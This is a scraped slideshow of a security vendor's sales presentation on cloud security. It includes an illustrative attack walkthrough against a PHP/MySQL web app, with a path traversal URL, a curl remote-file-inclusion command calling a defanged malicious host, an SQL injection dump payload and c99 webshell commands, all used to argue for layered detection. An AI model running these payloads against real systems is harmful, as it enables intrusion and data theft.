Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Realities of Security in the Cloud

216 views

Published on

Realities of Security in the Cloud

Published in: Technology
  • Be the first to comment

Realities of Security in the Cloud

  1. 1. REALITIES OF SECURITY IN THE CLOUD Mark Brooks VP, Sales Engineering, Alert Logic
  2. 2. Security is a challenge.
  3. 3. Security Has Changed
  4. 4. • Security Monitoring • Log Analysis • Vulnerability Scanning • Network Threat Detection • Security Monitoring • Secure Coding and Best Practices • Software and Virtual Patching • Configuration Management • Access Management (including multi- factor authentication) • Access Management • Configuration Hardening • Patch Management • TLS/SSL Encryption • Network Security Configuration • Web Application Firewall • Vulnerability Scanning • Application level attack monitoring • Hypervisor Management • System Image Library • Root Access for Customers • Managed Patching (PaaS, not IaaS) • Logical Network Segmentation • Perimeter Security Services • External DDOS, spoofing, and scanning monitored APPS CUSTOMER ALERT LOGICMICROSOFT VIRTUAL MACHINES NETWORKING INFRASTRUCTURE SERVICES Security in the Cloud is a Shared Responsibility
  5. 5. Let’s talk about security coverage.
  6. 6. Tame the Beast Industry Challenge: The Good, the Bad and the Ugly Known Good Known Bad Suspicious Allow Identify | Tune | Permit Block Drop | Reconfigure Application Stack Web Apps Server-side Apps App Frameworks Dev Platforms Databases Server OS Hypervisor Hardware Classification Action HUMAN EXPERT REQUIRED
  7. 7. Classic 3-Tier Web Application Key Target Assets Key target assets for attack Across the Full Stack 1. Custom application 2. Web server implementation Apache, IIS, NGINGX 3. Application server implementation Tomcat, Jboss, Jetty, ASP 4. Web server frameworks and languages Struts, PHP, Java 5. Databases mySql, Oracle, MSSQL,.. 6. Azure Services VMs, Storage Azure VMs Azure VMs VNET Traffic Manager Users Internet gateway Load Balancers DB instance DB instance AvailabilityzoneAAvailabilityzoneB VMScale Sets Web App Server VMScale Sets Storage Blob Azure VMs Azure VMs
  8. 8. An attack scenario - Recon VNET Traffic Manager Internet gateway LB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB Storage Bastion Host PHP Application On Linux 1 – Performs low-frequency app-scan 2 – Tests path traversal and enumerates directories 3 – Tests remote file inclusion Recon Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=.. /../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site- import/admin/page.php> Attacker learnings: vulnerable PHP/mySql app, prone to both smash’n grab attacks as more persistent attack approaches
  9. 9. Entry and data exfiltration • Attacker launches a series of SQL-I injection discovery attempts • Gets a dump-in-one-shot attack and gets full table return http://victim.com/report.php?id=23 and(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a) Attacker achievements: obtained sensitive customer-data without need for local process or system breaches on servers An attack scenario – opportunistic exfiltration VNET Traffic Manager Internet gateway LB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB Storage Bastion Host PHP Application On Linux 4 - SQL-I data extraction attack Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=../../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability Curl -X POST -F 'url=http [://] malicious [dot] com/test.php' http [://] mysite [dot] com/wp-content/plugins/site-import/admin/page.php> Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks as more persistent attack approaches Entry/Exfil
  10. 10. VNET Traffic Manager Internet gateway LB mySQL instance On linux AvailabilityzoneAAvailabilityzoneB Storage Bastion Host PHP Application On Linux 5 - Webshell injection 6 - Commanding through Shell Command and control (C&C) • Attacker uploads c99 webshell via RFI vulnerability • Persistent foothold for lateral movement established curl -X POST -F 'act=search' -F 'grep=' -F 'fullhexdump=' -F 'base64=' -F 'nixpasswd=' -F 'pid=' -F 'c=' -F 'white=' -F 'sig=' -F 'processes_sort=' -F 'd=/var/www/' -F 'sort=' -F 'f=' -F 'ft=' http [://] mysite [dot] com/path/to/c99 Attacker achievements: obtained foothold for further action and lateral movement Entry and data exfiltration • Attacker launches a series of SQL-I injection attempts • Gets a dump-in-one-shot attack and gets full table return Attacker achievements: obtained sensitive customer-data without need for local process or system breaches on servers Recon • low slow application level scan • Attacker learns PHP app, on linux, likely mySql DB • Suspects vulnerabilities • tests potential path traversal vulnerability /bWAPP/directory_traversal_2.php?directory=../../../../etc • Path traversal is successful. Attacker enumerates server directories. • tests remote file inclusion vulnerability (RFI) Attacker learnings: vulnerable PHP/mySql app, prone to both smasn’n grab attacks as more persistent attack approaches An attack scenario – persistent foothold Command and control
  11. 11. Deep Application threat visibility Network inspection Expert SOC Analysis of Findings Network, system, application infrastructure threat visibility Alert Logic’s Approach AuditLogs Config&VulnAssessment Foundation Asset and exposure visibility Log Collection HTTP Inspection Expert Curation, R&D of Content and Intel Analytics and Machine Learning Content and Intel Application level Web Attacks OWASP Top 10 Attacks against vulnerable platforms and libraries Attacks against miscon- figurations
  12. 12. Coverage needed for this scenario Low slow scan Path traver sal RFI SQLi Web shell Recon Entry Exfil C&COverall combined coverage scorecard No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage How much can we see? AuditLogs
  13. 13. Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Recon Entry Exfil C&C AuditLogs Config&VulnAssessment Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
  14. 14. Network, system, application infrastructure threat visibility Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Network inspection providers visibility on attacker actions on the known vulnerabilities exploited in the attack and their success Recon Entry Exfil C&C Network inspection AuditLogs Config&VulnAssessment Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
  15. 15. Deep Application threat visibility Network, system, application infrastructure threat visibility Coverage needed for this scenario Foundation Asset and exposure visibility Low slow scan Path traver sal RFI SQLi Web shell Config and vulnerability assessment will reveal vulnerabilities present that attackers can exploit. Actual attacks in motion can not be detected with vuln and config scanning Network inspection providers visibility on attacker actions on the known vulnerabilities exploited in the attack and their success Deep HTTP inspection on requests and responses, learning and anomaly detection deepens coverage for whole classes of application attacks Recon Entry Exfil C&C Network inspection AuditLogs Config&VulnAssessment Log Collection HTTP Inspection Overall combined coverage No coverage Vulnerability coverage only Basic Threat Coverage Deep threat coverage
  16. 16. SECURITY EXPERTS Integrated Security Model Incident Investigation System Visual | Context | Hunt Data & Event Sources Assets | Config | Logs Automatic Detection Block | Alert | Log ML Algorithms Rules & Analytics Security Researchers Data Scientists Software Programmers Integrated: Infrastructure | Content | Human Experts Security Analysts
  17. 17. We designed security for cloud and hybrid environments GET STARTED IN MINUTES MAINTAIN COVERAGE AT CLOUD SCALE KEEP PRODUCTION FLOWING with modular services that grow with you Comply with integration to cloud APIs and DevOps automation with auto-scaling support and out-of-band detection Single pane of glass for workload and application security across cloud, hosted & on-premises
  18. 18. Leaders 28 8 6 4 10 25 3 5 5 11 8 10 15 24 Other Amazon Check Point Chronicle Data Cisco Fortinet Intel Security Okta Symantec Barricade JumpCloud Evident.io Palerra Microsoft CloudPassage CloudCheckr FortyCloud ThreatStack Alert Logic A recognized security leader “Alert Logic has a head start in the cloud, and it shows.” PETER STEPHENSON SC Magazine review “…the depth and breadth of the offering’s analytics and threat management process goes beyond anything we’ve seen…”Who is your primary in-use vendor for Cloud Infrastructure Security? Who are the top vendors in consideration for Cloud Infrastructure Security? Alert Logic
  19. 19. Over 4,000 worldwide customers AUTOMOTIVE HEALTHCARE EDUCATION FINANCIAL SERVICES MANUFACTURING MEDIA/PUBLISHING RETAIL/E-COMMERCE ENERGY & CHEMICALS TECHNOLOGY & SERVICES GOV’T / NON-PROFIT
  20. 20. Thank You.

×